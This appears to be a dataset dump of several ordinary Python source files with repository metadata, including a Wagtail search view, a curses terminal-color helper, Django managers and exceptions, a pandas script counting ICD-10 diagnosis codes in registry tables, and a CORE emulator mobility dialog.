resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
query.add_hit()
else:
search_results = Page.objects.none()
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| true | true |
f71928ded4483b24d811acaae516a6fa0a846be5 | 2,771 | py | Python | lib/terminal.py | stevecotton/i18nspector | b9fa6f5c54341f8c7e82b48adb0de05376bab8e7 | [
"MIT"
] | 1 | 2016-10-25T18:22:02.000Z | 2016-10-25T18:22:02.000Z | lib/terminal.py | stevecotton/i18nspector | b9fa6f5c54341f8c7e82b48adb0de05376bab8e7 | [
"MIT"
] | 8 | 2016-08-25T17:37:49.000Z | 2022-02-17T20:47:31.000Z | lib/terminal.py | stevecotton/i18nspector | b9fa6f5c54341f8c7e82b48adb0de05376bab8e7 | [
"MIT"
] | 3 | 2017-03-03T00:50:28.000Z | 2021-08-17T16:43:25.000Z | # Copyright © 2012-2018 Jakub Wilk <jwilk@jwilk.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
color terminal support
'''
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
'''
returns a string that changes the foreground color
'''
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s: # work-around for https://bugs.debian.org/902630
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
'''
returns a string that resets all attributes
'''
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
'''
initialize the terminal
'''
global _curses # pylint: disable=global-statement
try:
import curses as _curses # pylint: disable=redefined-outer-name,import-outside-toplevel
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
# vim:ts=4 sts=4 sw=4 et
| 28.864583 | 96 | 0.674125 |
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s:
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
global _curses
try:
import curses as _curses
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
| true | true |
f7192a92add38302ca93b33ef7669bbdd2fd3d64 | 1,534 | py | Python | backend/examples/managers.py | daobook/doccano | 45122687740f74f19e2578c5cf28507f0839bf16 | [
"MIT"
] | 2 | 2021-12-11T22:25:27.000Z | 2021-12-20T01:02:16.000Z | backend/examples/managers.py | daobook/doccano | 45122687740f74f19e2578c5cf28507f0839bf16 | [
"MIT"
] | 1 | 2022-02-15T10:50:18.000Z | 2022-02-15T10:50:18.000Z | backend/examples/managers.py | daobook/doccano | 45122687740f74f19e2578c5cf28507f0839bf16 | [
"MIT"
] | null | null | null | from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| 35.674419 | 91 | 0.594524 | from django.db.models import Count, Manager
class ExampleManager(Manager):
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
uuids = [data.uuid for data in objs]
examples = self.in_bulk(uuids, field_name='uuid')
return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
def count_done(self, examples, user=None):
if user:
queryset = self.filter(example_id__in=examples, confirmed_by=user)
else:
queryset = self.filter(example_id__in=examples)
return queryset.distinct().values('example').count()
def measure_member_progress(self, examples, members):
done_count = self.filter(example_id__in=examples)\
.values('confirmed_by__username')\
.annotate(total=Count('confirmed_by'))
response = {
'total': examples.count(),
'progress': [
{
'user': obj['confirmed_by__username'],
'done': obj['total']
} for obj in done_count
]
}
members_with_progress = {o['confirmed_by__username'] for o in done_count}
for member in members:
if member.username not in members_with_progress:
response['progress'].append({
'user': member.username,
'done': 0
})
return response
| true | true |
f7192c7b1ed57d054d205ebd4ca697e7e2c4e65c | 10,095 | py | Python | datapreparation/analyze.py | Anders-Holst/Bonsai | 841aa4e12c8bea8945396bd232c2006260127507 | [
"MIT"
] | null | null | null | datapreparation/analyze.py | Anders-Holst/Bonsai | 841aa4e12c8bea8945396bd232c2006260127507 | [
"MIT"
] | null | null | null | datapreparation/analyze.py | Anders-Holst/Bonsai | 841aa4e12c8bea8945396bd232c2006260127507 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
""" -------------------------------
analyse.py
Copyright (C) 2018 RISE
This code was produced by RISE
The 2013-04-10 version
bonsai/src_v02/analyze.py
simple analysis of pandas dataframes data
such as
1. find duplicated rows
2. number of unique values in a column
3. number of unique values in common
between two columns in two different
files
4.
------------------------------------"""
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
d = df.drop_duplicates()
return len(d)
def nr_of_unique_values_in_cols(df, cols):
c = df.drop_duplicates(subset = cols)
return len(c)
def nr_of_unique_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
return len(c)
"""
def nr_of_unique_numeric_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isnumeric()
c = c[c].index.values
"""
def nr_of_nonnan_values(df, col):
c = df[col].dropna()
return len(c)
def nr_of_unique_digital_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isdigit()
c = c[c].index.values
# df = df.drop_duplicates(subset = col)
# df = df[ df[col].dropna().str.isdigit() ]
# df = df[ df[col].str.contains('\d', regex=True) ]
return len(c)
def duplicated_rows(df):
df['dup'] = df.duplicated()
df = df[df['dup'] == True]
return df
def print_duplicated_rows(df, nr):
dup = duplicated_rows(df)
print('Nr of rows in total', len(df))
print('Nr of duplicated rows', len(dup))
nr = min( nr,len(dup) )
if nr > 0:
print('the first', nr,' of them')
print(dup[0:nr])
return dup
def unique_number_values(df, col):
df = df.drop_duplicates(subset = col)
df = df[ df[col].str.contains('\d', regex=True) ]
return df
def info(df, name = ''):
print()
if name != '':
print()
print('--------------------------------------------------')
print()
print('\tInfo on the file\n\t' + name)
print()
print('--------------------------------------------------')
print()
df_unique_nr = nr_of_unique_rows(df)
print(' shape', df.shape)
print(' unique rows', df_unique_nr)
for c in df.columns:
print()
print('\tInfo on non-nan values of column', c)
print()
nonnan_nr = nr_of_nonnan_values(df, c)
unique_nr = nr_of_unique_values(df, c)
digital_nr = nr_of_unique_digital_values(df, c)
# numeric_nr = nr_of_unique_numeric_values(df, c)
print('non-nan values', nonnan_nr)
print(' unique values', unique_nr)
print('digital values', digital_nr)
# print('numeric values', unique_nr)
print()
# return unique_number_values(df, 'ICD10')
# df = df[ df[c].str.contains('\d', regex=True) ]
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
xs = list(dfx['LopNr'].values)
ys = list(dfy['LopNr'].values)
sx = set(xs)
sy = set(ys)
cut = sx & sy
ux = sx - sy
uy = sy - sx
print()
# print('shape ' + namex + '\t\t', dfx.shape)
# print('shape ' + namey + '\t\t', dfy.shape)
# print('unique Lopnr ' + namex + '\t', len(xs))
# print('unique Lopnr ' + namey + '\t', len(ys))
print('common Lopnr\t\t\t', len(cut))
print('Lopnr in ' + namex + ' only\t', len(ux))
print('Lopnr in ' + namey + ' only\t', len(uy))
print()
ux = list(ux)
uy = list(uy)
ux.sort
uy.sort
return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
""" -------------------------------
4. count amd list various types of diagnosis
codes in care data
------------------------------------"""
"""
def is_icd10_class(x):
if not common.isstr(x):
return False
if common.is_icd10(x):
return False
if len(x) < 3:
return False
if not x[0].isupper():
return False
return x[1].isdigit() and x[2].isdigit()
"""
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
# print(x)
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
# print(x)
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
# print(x)
count += 1
return count
"""
def code_list(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
"""
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
"""
for c in df1[dia].values:
print('\t', c)
"""
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
#print(codes)
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
"""
size0 = len(df)
df = df.dropna().reset_index(drop=True)
print('nr of empty lines:', size0- len(df))
"""
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| 22.995444 | 71 | 0.525706 |
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
d = df.drop_duplicates()
return len(d)
def nr_of_unique_values_in_cols(df, cols):
c = df.drop_duplicates(subset = cols)
return len(c)
def nr_of_unique_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
return len(c)
def nr_of_nonnan_values(df, col):
c = df[col].dropna()
return len(c)
def nr_of_unique_digital_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isdigit()
c = c[c].index.values
return len(c)
def duplicated_rows(df):
df['dup'] = df.duplicated()
df = df[df['dup'] == True]
return df
def print_duplicated_rows(df, nr):
dup = duplicated_rows(df)
print('Nr of rows in total', len(df))
print('Nr of duplicated rows', len(dup))
nr = min( nr,len(dup) )
if nr > 0:
print('the first', nr,' of them')
print(dup[0:nr])
return dup
def unique_number_values(df, col):
df = df.drop_duplicates(subset = col)
df = df[ df[col].str.contains('\d', regex=True) ]
return df
def info(df, name = ''):
print()
if name != '':
print()
print('--------------------------------------------------')
print()
print('\tInfo on the file\n\t' + name)
print()
print('--------------------------------------------------')
print()
df_unique_nr = nr_of_unique_rows(df)
print(' shape', df.shape)
print(' unique rows', df_unique_nr)
for c in df.columns:
print()
print('\tInfo on non-nan values of column', c)
print()
nonnan_nr = nr_of_nonnan_values(df, c)
unique_nr = nr_of_unique_values(df, c)
digital_nr = nr_of_unique_digital_values(df, c)
print('non-nan values', nonnan_nr)
print(' unique values', unique_nr)
print('digital values', digital_nr)
print()
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
xs = list(dfx['LopNr'].values)
ys = list(dfy['LopNr'].values)
sx = set(xs)
sy = set(ys)
cut = sx & sy
ux = sx - sy
uy = sy - sx
print()
print('common Lopnr\t\t\t', len(cut))
print('Lopnr in ' + namex + ' only\t', len(ux))
print('Lopnr in ' + namey + ' only\t', len(uy))
print()
ux = list(ux)
uy = list(uy)
ux.sort
uy.sort
return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
count += 1
return count
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| true | true |
f7192ca4418b9d3bb4703a309575a6c835793c29 | 2,000 | py | Python | daemon/core/gui/dialogs/mobilityconfig.py | montag451/core | 3be162b0b0f54b35520b980023abdfad4ff5e489 | [
"BSD-2-Clause"
] | null | null | null | daemon/core/gui/dialogs/mobilityconfig.py | montag451/core | 3be162b0b0f54b35520b980023abdfad4ff5e489 | [
"BSD-2-Clause"
] | null | null | null | daemon/core/gui/dialogs/mobilityconfig.py | montag451/core | 3be162b0b0f54b35520b980023abdfad4ff5e489 | [
"BSD-2-Clause"
] | null | null | null | """
mobility configuration
"""
from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| 30.769231 | 82 | 0.643 | from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| true | true |
f7192d36362e57de19098cfbb44d604a21beea70 | 27 | py | Python | src/user/__init__.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/user/__init__.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/user/__init__.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | from user.user import User
| 13.5 | 26 | 0.814815 | from user.user import User
| true | true |
f7192d364390595ddfd11a6ee7c5d20a2c7dadff | 759 | py | Python | revibe/_errors/accounts.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | 2 | 2022-01-24T23:30:18.000Z | 2022-01-26T00:21:22.000Z | revibe/_errors/accounts.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | revibe/_errors/accounts.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
# -----------------------------------------------------------------------------
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| 33 | 79 | 0.715415 | from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| true | true |
f7192ecde00bc5320bdb6678d1b0c377180f6a7d | 59 | py | Python | resources/resources/enow/jython/pythonSrc/__init__.py | ENOW-IJI/ENOW-server | 1398d5a9d037efcee2886f6c7393b5e396ab0c18 | [
"Apache-2.0"
] | 3 | 2016-08-12T14:46:53.000Z | 2016-08-13T02:54:58.000Z | resources/resources/enow/jython/pythonSrc/__init__.py | ENOW-IJI/ENOW-server | 1398d5a9d037efcee2886f6c7393b5e396ab0c18 | [
"Apache-2.0"
] | 1 | 2016-08-30T15:58:19.000Z | 2016-08-30T15:58:19.000Z | python/enow/jython/pythonSrc/__init__.py | ENOW-IJI/api | 415fc69fc8f1ad25f1619aca0fa932f92e8b9d09 | [
"Apache-2.0"
] | null | null | null | __all__ = ["preCode", "body", "postCode", "StreamToLogger"] | 59 | 59 | 0.677966 | __all__ = ["preCode", "body", "postCode", "StreamToLogger"] | true | true |
f7192f1a1cfbc76f583f0c727d070157e0eb514b | 542 | py | Python | manage.py | preet4737/College-Event-Manager | c8da687adeaa4f7f16d717a554e0e7af609fd305 | [
"MIT"
] | 3 | 2019-12-20T05:51:48.000Z | 2020-02-01T20:56:39.000Z | manage.py | preet4737/College-Event-Manager | c8da687adeaa4f7f16d717a554e0e7af609fd305 | [
"MIT"
] | 6 | 2020-03-24T05:42:57.000Z | 2020-03-24T05:42:59.000Z | manage.py | preet4737/College-Event-Manager | c8da687adeaa4f7f16d717a554e0e7af609fd305 | [
"MIT"
] | 4 | 2019-03-14T11:09:30.000Z | 2019-03-31T18:12:59.000Z | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.875 | 74 | 0.686347 |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| true | true |
f7192f9313d327c6a79ea32950ca12ca646bc3cc | 434 | py | Python | src/accounts/migrations/0005_auto_20180606_0601.py | ciphertz/final | 28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6 | [
"bzip2-1.0.6"
